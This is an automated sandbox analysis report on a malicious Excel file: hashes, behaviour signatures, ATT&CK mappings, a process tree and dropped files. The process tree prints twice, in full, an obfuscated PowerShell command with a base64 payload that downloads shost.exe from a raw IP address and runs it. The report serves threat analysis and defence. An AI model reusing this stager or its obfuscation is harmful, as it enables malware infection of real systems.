53a72f1f77a45e47084294a0103726076af1b4eef291b034639e1cfb99ed597d

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
21/08/2024, 01:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

53a72f1f77a45e47084294a0103726076af1b4eef291b034639e1cfb99ed597d.xls
Size

295KB
MD5

ec1d37555fb0c9c1b55e198f319efb15
SHA1

10e5e0c0a996ccdfd0ca4cbdd6f55c2c49d13dc6
SHA256

53a72f1f77a45e47084294a0103726076af1b4eef291b034639e1cfb99ed597d
SHA512

173ccb3ec44e96f2048ce7d93c0d7c2225b9b74d2e2a2c486b0c262d05a11c3a912cbc3995f6a72f01acbd9bc738cbc055303b8a678e7e3283d1195fb9532830
SSDEEP

3072:XMAJbziaeKJD49xYDJqAnHkE0AcPcWmmIZhojyXlSihEVC29p459aHunCHbcfEE:cqDsxYDJqAnHcTcW4PojyXzEP9r89

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	2168	mshta.exe
11	2168	mshta.exe
14	2276	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2276	powershell.exe
3032	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2380	shost.exe

Loads dropped DLL 1 IoCs

pid	Process
2276	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2752	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2276	powershell.exe
2276	powershell.exe
2276	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	2380	shost.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2752	EXCEL.EXE
2752	EXCEL.EXE
2752	EXCEL.EXE
2752	EXCEL.EXE
2752	EXCEL.EXE
2752	EXCEL.EXE
2752	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 3032	2168	mshta.exe	32
PID 2168 wrote to memory of 3032	2168	mshta.exe	32
PID 2168 wrote to memory of 3032	2168	mshta.exe	32
PID 2168 wrote to memory of 3032	2168	mshta.exe	32
PID 3032 wrote to memory of 2276	3032	cmd.exe	34
PID 3032 wrote to memory of 2276	3032	cmd.exe	34
PID 3032 wrote to memory of 2276	3032	cmd.exe	34
PID 3032 wrote to memory of 2276	3032	cmd.exe	34
PID 2276 wrote to memory of 2808	2276	powershell.exe	35
PID 2276 wrote to memory of 2808	2276	powershell.exe	35
PID 2276 wrote to memory of 2808	2276	powershell.exe	35
PID 2276 wrote to memory of 2808	2276	powershell.exe	35
PID 2808 wrote to memory of 2916	2808	csc.exe	36
PID 2808 wrote to memory of 2916	2808	csc.exe	36
PID 2808 wrote to memory of 2916	2808	csc.exe	36
PID 2808 wrote to memory of 2916	2808	csc.exe	36
PID 2276 wrote to memory of 2380	2276	powershell.exe	37
PID 2276 wrote to memory of 2380	2276	powershell.exe	37
PID 2276 wrote to memory of 2380	2276	powershell.exe	37
PID 2276 wrote to memory of 2380	2276	powershell.exe	37

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\53a72f1f77a45e47084294a0103726076af1b4eef291b034639e1cfb99ed597d.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2752

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PowersHeLL.eXE -eX byPAss -nOp -W 1 -C DeVICecRedentIAlDePLoYMENT ; IeX($(iEX('[sYStEM.teXt.enCoDING]'+[CHar]58+[cHar]0X3A+'uTF8.gEtStrINg([syStEM.COnvErT]'+[char]58+[CHaR]0X3a+'fROMbaSE64sTRIng('+[ChAr]34+'JG5MS1R2TSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iZXJERUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEh6YlQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKUyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5tZXZMYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiQWdCakNLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWld3c1ZrSFVjKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqS1JMUmhFRHNPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG5MS1R2TTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC4xMi44MS4yNTIvMjIwL3Nob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzaG9zdC5leGUiLDAsMCk7U1RhclQtc0xlRXAoMyk7c1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2hvc3QuZXhlIg=='+[Char]0X22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowersHeLL.eXE -eX byPAss -nOp -W 1 -C DeVICecRedentIAlDePLoYMENT ; IeX($(iEX('[sYStEM.teXt.enCoDING]'+[CHar]58+[cHar]0X3A+'uTF8.gEtStrINg([syStEM.COnvErT]'+[char]58+[CHaR]0X3a+'fROMbaSE64sTRIng('+[ChAr]34+'JG5MS1R2TSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iZXJERUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEh6YlQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKUyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5tZXZMYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiQWdCakNLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWld3c1ZrSFVjKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqS1JMUmhFRHNPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG5MS1R2TTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC4xMi44MS4yNTIvMjIwL3Nob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzaG9zdC5leGUiLDAsMCk7U1RhclQtc0xlRXAoMyk7c1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2hvc3QuZXhlIg=='+[Char]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2276
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aycyzodw.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2808
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8612.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8611.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2916
  - - C:\Users\Admin\AppData\Roaming\shost.exe
      "C:\Users\Admin\AppData\Roaming\shost.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
64ea61cb7cfbac1f5c002437b5ddd671

SHA1
d0bd5edbe45b3b06111943d91d6510c26144b934

SHA256
2bfc7627f5eba734bc74e6df02267ec2afaca48a621b74cb89c4c06ed832e18c

SHA512
7db232c617fe725408f2f8f1217cc0d3795b3df16649969304e17bc08263e513232c5cea890730ad00dbaff3e1e219bc5b7b6a78bd74322bece1fdc77fdc0d63

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
79373e36fe8605968a2e66f983b0a187

SHA1
c78a9ef450b670b14aec346eabda5c3529176154

SHA256
60486d58384f7244f235c9b0fe08b9a271ed754f90016df2b4a2c896eb808ecb

SHA512
d666974062709354d06922ae866b722c18a482287b8ea480690c96cf791e492c0bb040743425dad2575b3cb2b37de8eb6d95db9bf51d4faecfdb62da49e76d30

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
db0c9a0a99fbcd9c0cafa352a155cbae

SHA1
b1ce5593e487f2b7aa56c898b5c13e55abe20014

SHA256
c7f999e1938fd3841c0277b7fad2e7e589ce89051257511e4b6386f29c86482e

SHA512
3b5946e502b9e1dcc5dda2f7486d31ed3634c45ff0b28d0d7374b22c1ec44dbda833331aa6fe214c25c28520031345c08c4789bebfd87e575b2383dc624d7a39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M7GT0RRO\newupdate[1].hta

Filesize
8KB

MD5
0ff7919a583bd5c69cf90a420d2c0d9f

SHA1
f4038ce54e20206a1fd4b79af11a78c1b046cfb0

SHA256
23350cd2b9641d8818fc757eceb5a6a532e5df10f9c697b76ac4308bb1d39eb9

SHA512
dd99895905d9a799f5bba245f27b0d66f112cd3d58a86c74494f6aa64fc0a8c39967bca23ebb3e5de2950627683fe1e6dd57054e0438a0acd61159cb62beba2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7945.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8612.tmp

Filesize
1KB

MD5
bf6f4544b69ddf18dfb5085d674beb24

SHA1
f4fd9db4e04b2ea55097c698a03760c29d401c3b

SHA256
c5d6bf214af60b355761d155242f9c1a1a38ac832a467229d47d9bd7e24b01a2

SHA512
e8d74f1205751ae09328349e39e29453a2a82f9a0af5660e04d9ab3fe2648cc4053c4d012ccff914f40d5e3282c43fea585211132a8e7f62c0be13c6936f9e9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\aycyzodw.dll

Filesize
3KB

MD5
783d05058e40e59099e8357b3cb264e5

SHA1
af28cd4b5024dedeb9e3b731f26a6f9ed4e9f92a

SHA256
84d42be35988f9f6a7082b7253507af60f23d0152f49375823e364a191a001c4

SHA512
f0e5d27e19315ed2ed5b51182ab8dbff3ced7c347531d24bff1c7cd471a5e0a81bebaa1cfe6b43a6d44b4620ee34ada04a3b0563347fe7ac114689fa584f2471

Download Submit
C:\Users\Admin\AppData\Local\Temp\aycyzodw.pdb

Filesize
7KB

MD5
4dc2beefe79a40ff32ad649e05d20252

SHA1
92802a68098752371c73c087639b34fb7fce36e7

SHA256
492cad5b9b482cc83a4ddc5321c3cf5765205afb340f09151c779e2f9809c472

SHA512
4d3f5ae807a92e6c3acfb1cf26909f4dd5c49a0fd515a0fc863803a5e23727a99dd7cec508ec72da8db5d86a41ddd9354a9a59806d64c97d460192d369c91c1a

Download Submit
C:\Users\Admin\AppData\Roaming\shost.exe

Filesize
16KB

MD5
10a826203139ab5be148ca3ff88b8acc

SHA1
1be8e646f6966b9ff6658a5ed52c0953f11157a6

SHA256
e39efc1e1e00404b9ddc7659941af58f417a6383baf12b5878b1da36e46ae55f

SHA512
1a65232447d851a2380edb1533d8137a0b3a2236ab757b8473ec11e393604a77db3b64764c6f2c2d3fbc11c1ab7c32a8a1ec493e2b4a509af8adcce1be3b552e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8611.tmp

Filesize
652B

MD5
2a3aca154c31443d282bcf92eab1412c

SHA1
f2f6cc1e3b437dc7a3371d7d3ecffd547c1af3ee

SHA256
b53e3adc73ac94a26ae0161d1c2d8ee19fd5d8f26c4cf784f2861a4ee02ebe2a

SHA512
74fa3d88cbb13834cc4365c5ae490548284ba5364ab438adb6040fd608cbfb3518beddc9811d443a925de6ecdd10a22a8366a3d919c660b9b06d566b8b4e3def

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aycyzodw.0.cs

Filesize
467B

MD5
67e4777aa0535139652e6b862da2b9c3

SHA1
478bb159e9cb8439d599bb5bd532507bc9679db4

SHA256
e8b0be18b8fbeb74eb175a9af3e45671c16c22098ee64473b551b244b924a5c0

SHA512
ee2917082643cdb0ce1182baa2c638187bfa514d81234ba6aa7998fe7f72a321a0db78a4142fccf295f4e9f8a6717caa0139d601e960044b23515ef9a74f1c9f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aycyzodw.cmdline

Filesize
309B

MD5
84a69e04657ea24d138be228034bb517

SHA1
d47f3d407c03015c088526944721accdd79a01a3

SHA256
6e67a3486e9f67d7b864b8bb32c4c66e64eb7b8b9fcabfe744c69aaaf693e5c9

SHA512
6630a756baa707ae29b1849f25a4c31af0b2e0c9dffc1b4c59a1e9ca9a4c122b6112878256434594b3a7bab446420efd1966daef2f0d3ca252cd6c8c1e038349

Download Submit
memory/2168-18-0x0000000001140000-0x0000000001142000-memory.dmp

Filesize
8KB

Download
memory/2380-64-0x00000000012D0000-0x00000000012D8000-memory.dmp

Filesize
32KB

Download
memory/2752-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2752-1-0x000000007218D000-0x0000000072198000-memory.dmp

Filesize
44KB

Download
memory/2752-19-0x0000000002E30000-0x0000000002E32000-memory.dmp

Filesize
8KB

Download
memory/2752-65-0x000000007218D000-0x0000000072198000-memory.dmp

Filesize
44KB

Download
memory/2752-67-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2752-70-0x000000007218D000-0x0000000072198000-memory.dmp

Filesize
44KB

Download